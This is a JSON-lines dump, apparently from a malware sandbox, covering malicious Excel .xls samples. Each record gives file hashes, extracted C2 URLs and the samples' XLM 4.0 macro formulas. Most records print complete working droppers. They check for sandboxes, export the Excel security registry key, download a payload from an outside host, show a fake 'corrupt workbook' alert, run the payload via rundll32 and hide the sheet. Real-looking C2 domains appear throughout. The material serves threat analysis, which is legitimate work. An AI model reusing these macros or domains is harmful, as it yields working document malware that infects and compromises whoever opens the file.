Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xv0Y6UuvF3\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ba69ae888eb22e04cc30a3e724fb145177a9999969f86492d141e143209a9f4"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2ba69ae888eb22e04cc30a3e724fb145177a9999969f86492d141e143209a9f4","filesize":170496,"md5":"b630d9569dd472bc81883170916c7b47","sha1":"f3789cd18955d5c7859dd009e3fbc038bffd23c2","sha256":"2ba69ae888eb22e04cc30a3e724fb145177a9999969f86492d141e143209a9f4","sha512":"d326254d61914ed2156f18fa4979e2d216e22412628606ea40a5e30a216a04d13a6f9acc4bb1d535729c1816280dfc443a2728e4a4aa1b4a4147e3fa1f752c16","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ba69ae888eb22e04cc30a3e724fb145177a9999969f86492d141e143209a9f4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yYFo4FAvA5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ba722873adb3918073d6bc4dfdd873f80c3518fffb4ddba3613d8699d10062a"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2ba722873adb3918073d6bc4dfdd873f80c3518fffb4ddba3613d8699d10062a","filesize":167936,"md5":"5e2f27f09b5451b8bb68f18687f09b02","sha1":"3558268ef4f8e5f387e4c627844334c9d13fc6de","sha256":"2ba722873adb3918073d6bc4dfdd873f80c3518fffb4ddba3613d8699d10062a","sha512":"c5f8f147078d4433ce1e9a8d8804b4a8e22766a74db68d68644847d49707cdafad75e39861cf4d214d5437b3e28bbf745703ded3af86cc003537a6d8bd98cb6c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ba722873adb3918073d6bc4dfdd873f80c3518fffb4ddba3613d8699d10062a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Uk2S3Zk6SZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2bb7c55c0b17c55be92b9dea2759b289d8dae54dd07ddfc9c292e1e8adbb96a7"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2bb7c55c0b17c55be92b9dea2759b289d8dae54dd07ddfc9c292e1e8adbb96a7","filesize":116224,"md5":"16bd08c7b55c94078c22c5057a741795","sha1":"031858330cbc0d2117f4fb67e176345d0e38a267","sha256":"2bb7c55c0b17c55be92b9dea2759b289d8dae54dd07ddfc9c292e1e8adbb96a7","sha512":"9a37443606cb13af570adaf6d769f83e3d18bf8483b00de1b553f51277b3fd62685dcd4260437cfaeaa011419216a122a39bbfc5d6df7e685fd03cac93d95f1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2bb7c55c0b17c55be92b9dea2759b289d8dae54dd07ddfc9c292e1e8adbb96a7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9iFooBhr1e\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2c27186e2323a9ea34c59a3de895e521700d523267beec6bc0ef67a693b98e23"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2c27186e2323a9ea34c59a3de895e521700d523267beec6bc0ef67a693b98e23","filesize":209920,"md5":"c942a7680dbde3550452bc684458de82","sha1":"1da230f9eaed2418f14dd407b4df6d42cb82a432","sha256":"2c27186e2323a9ea34c59a3de895e521700d523267beec6bc0ef67a693b98e23","sha512":"84b4d69cdc2431265e9bdce5d862fa21a09bbfeca4323f4bc79dc6d4a9b62c4f1e901685d6a50afd394712eb51f107de37e40ee780d8c5d7230af6348cfb33b3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2c27186e2323a9ea34c59a3de895e521700d523267beec6bc0ef67a693b98e23.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UHtHkRfIIR\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2c4c8a5a616886c4cc53dcc64d6c31177a6a6499a0159876edb32f661e31ca3f"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2c4c8a5a616886c4cc53dcc64d6c31177a6a6499a0159876edb32f661e31ca3f","filesize":85504,"md5":"b954c4dc355aaa2ce7105e285ebef0c6","sha1":"956b3ad15198cfb86ddd1e1c08fe3b4e544faa2f","sha256":"2c4c8a5a616886c4cc53dcc64d6c31177a6a6499a0159876edb32f661e31ca3f","sha512":"050e696f751628bcf0103e997430339c9018f462f7881356f9df896fe09a7c1aef0b5fdf06ace6a25490d90251be6a6a07fcb50d38d01f011f030059126d594b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2c4c8a5a616886c4cc53dcc64d6c31177a6a6499a0159876edb32f661e31ca3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(0,0)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2c4ffe5df8c090e5383999265ef5965df162fba4ed46d0e0eb0952b8f6b84aaf"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2c4ffe5df8c090e5383999265ef5965df162fba4ed46d0e0eb0952b8f6b84aaf","filesize":206336,"md5":"2440d275def5b2f071ac3d1545f17bcc","sha1":"aac6ceff4929442b016c6f9f20c5af3e3a2d0246","sha256":"2c4ffe5df8c090e5383999265ef5965df162fba4ed46d0e0eb0952b8f6b84aaf","sha512":"ddcd10f47d8cb4dc12a0ecee1f79671aa42aefa67f49a88eafbedb739d5f5c61fdd48b5072fb285a7200c9d6d18964c18ef7c7fb8e18110632981e9bc1a6e0b2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2c4ffe5df8c090e5383999265ef5965df162fba4ed46d0e0eb0952b8f6b84aaf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jJYcwZoPQs\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2c5f012484ddc581d88ce9fb5a4540255001be0d024f68ae5d1c50e9ced6ff22"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2c5f012484ddc581d88ce9fb5a4540255001be0d024f68ae5d1c50e9ced6ff22","filesize":152576,"md5":"236644f1b7f98ae3c1f09283a28a512d","sha1":"72a95446fa46fe2f263921466f3906f64e034c19","sha256":"2c5f012484ddc581d88ce9fb5a4540255001be0d024f68ae5d1c50e9ced6ff22","sha512":"120ee518f6e0c5e47e5469abfb10de45a2feea8a046c6c8ba998dbcd5f480816b5676b5535c15d30cf02513ce78a572e962866af96a1c3b4e2e5dfeae42de4fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2c5f012484ddc581d88ce9fb5a4540255001be0d024f68ae5d1c50e9ced6ff22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ckmZsDnwdm\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2c70919459581d8462902a30ebaa0a08051938ff90208a20a2fca271084bb0c0"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2c70919459581d8462902a30ebaa0a08051938ff90208a20a2fca271084bb0c0","filesize":120320,"md5":"93d270368f5af7dbcf4cc5a54346a6d6","sha1":"300005b3a202ce37991ccc0c154bd32819689e84","sha256":"2c70919459581d8462902a30ebaa0a08051938ff90208a20a2fca271084bb0c0","sha512":"c6674a0b085779d2b855ce89877d390d8d85c1b86482502f345e2e375bcb38a58f793e19c1d00024f4a6c6b630ce1b5e8510c3632e4c455bf4357f502cec7c6e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2c70919459581d8462902a30ebaa0a08051938ff90208a20a2fca271084bb0c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QUlQ9VIXBn\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2c91d77df1ef857ed1b590199f4bb846dfbc6bd01e0248f54713992127ac4e3e"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2c91d77df1ef857ed1b590199f4bb846dfbc6bd01e0248f54713992127ac4e3e","filesize":112128,"md5":"08da1d80cf4c970c66f627076cdd0c29","sha1":"1216c3d3dcb5849b0463d99f47723c316c4c0a90","sha256":"2c91d77df1ef857ed1b590199f4bb846dfbc6bd01e0248f54713992127ac4e3e","sha512":"1b43dbe5d48fab2ed15342dfdf4477a61b4491115b13ad1e93a060f6caee77f74c6a3783fb9c2a805de345333f3f33db47fc5d5df3510e6cdd071ddaddb03c98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2c91d77df1ef857ed1b590199f4bb846dfbc6bd01e0248f54713992127ac4e3e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ca1baf6ceb617a393e6b3fa19313c7c22e0cb9478b3a9ecc2a7629e3004c521"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2ca1baf6ceb617a393e6b3fa19313c7c22e0cb9478b3a9ecc2a7629e3004c521","filesize":185344,"md5":"26436cffdb63eebbd67c13eb6b975b5c","sha1":"dfb3a45aca5cb2064e98f4a469db6ece87d31846","sha256":"2ca1baf6ceb617a393e6b3fa19313c7c22e0cb9478b3a9ecc2a7629e3004c521","sha512":"92f1ca977ad187f4570bd1b9861a4de3cbf336e528bdb1b2b2a69cb48a6ae90947efd0a2e9e26733bb8e3a85ce476dab56e1363ff9c2aa2356519a9b2433f8f8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ca1baf6ceb617a393e6b3fa19313c7c22e0cb9478b3a9ecc2a7629e3004c521.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2cca43ce43c8c32bcae5cc85503954edb57f405f7c7075a62734f63288aed703"},"analysis":{"reported":"2020-04-09T16:15:31Z","score":10},"files":[{"filename":"2cca43ce43c8c32bcae5cc85503954edb57f405f7c7075a62734f63288aed703","filesize":225280,"md5":"955d8936c7dcd33a99e96bdc0b816861","sha1":"0c5e447b5a64326f5e0f757ca9b3bd60a9c8f2dd","sha256":"2cca43ce43c8c32bcae5cc85503954edb57f405f7c7075a62734f63288aed703","sha512":"9b5e55795657dea5a1ebd7ddd4da27a324afe1cb79c0d9ae776c8db0343d43d24fc4304f335b17536371dcd32385bb683490601d383f08dff5c6f31639d7812f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2cca43ce43c8c32bcae5cc85503954edb57f405f7c7075a62734f63288aed703.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2Iyr2cdbWS\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2cd490c60fd9a8fa9f39b59a4de16af7b11540b3a6b623dcc493732cc3ebb3ab"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2cd490c60fd9a8fa9f39b59a4de16af7b11540b3a6b623dcc493732cc3ebb3ab","filesize":168448,"md5":"f5c3305d7920c545c7d31bfe724fb70d","sha1":"fafd3ac66e60e5b84cd3f14dd17b9adee001c4ed","sha256":"2cd490c60fd9a8fa9f39b59a4de16af7b11540b3a6b623dcc493732cc3ebb3ab","sha512":"5fb0fe0540dfcea43debafc12ee7a9e7fcec008af3b887d228f64ced71cd8f576e67c0333e1fa922893bc1cc97a191eda3a64ba29e70a443dd49a873c23e1ff3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2cd490c60fd9a8fa9f39b59a4de16af7b11540b3a6b623dcc493732cc3ebb3ab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YXW1oWSrvb\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2cdf8feffeb149e1ccb09aabb281f379f20f6dce4194a45dcb1a0090535786a2"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2cdf8feffeb149e1ccb09aabb281f379f20f6dce4194a45dcb1a0090535786a2","filesize":104448,"md5":"8cdda77f8ee8c18695ab84b6f150e4a1","sha1":"7ab3c152abe3f82e564b45514b6a4b034facefab","sha256":"2cdf8feffeb149e1ccb09aabb281f379f20f6dce4194a45dcb1a0090535786a2","sha512":"dd5b06507978f0c08ce10b186be74122921e1b96835e3f0ac19f217777b57d4fb7cddb5b95fd416fd0e04da3f1dbc3d6674402f5100aa6b63dd8b8afc5129898","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2cdf8feffeb149e1ccb09aabb281f379f20f6dce4194a45dcb1a0090535786a2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"eWMo2nyy97\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ce1b9d85be0589a5bcc2c84acf9fa22c2f38d34d23aec13559a4b5a29686dad"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2ce1b9d85be0589a5bcc2c84acf9fa22c2f38d34d23aec13559a4b5a29686dad","filesize":209408,"md5":"9a9b658cc02cad94c19c0d651dd31bb3","sha1":"4eb2607465088b9b344f7f539624736732a0405a","sha256":"2ce1b9d85be0589a5bcc2c84acf9fa22c2f38d34d23aec13559a4b5a29686dad","sha512":"28d413656b8470c04470e1e2e0512f2eb7c81e9595b6b02f81d5ca4d4b3f5ff0c20b072a15bc18c2083e4ff4571b05e79efd40c5c23e6088017a54c3708f984c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ce1b9d85be0589a5bcc2c84acf9fa22c2f38d34d23aec13559a4b5a29686dad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"v11oNOqB1Q\",TRUE)\nGOTO(R$1C$10)"}}}]}
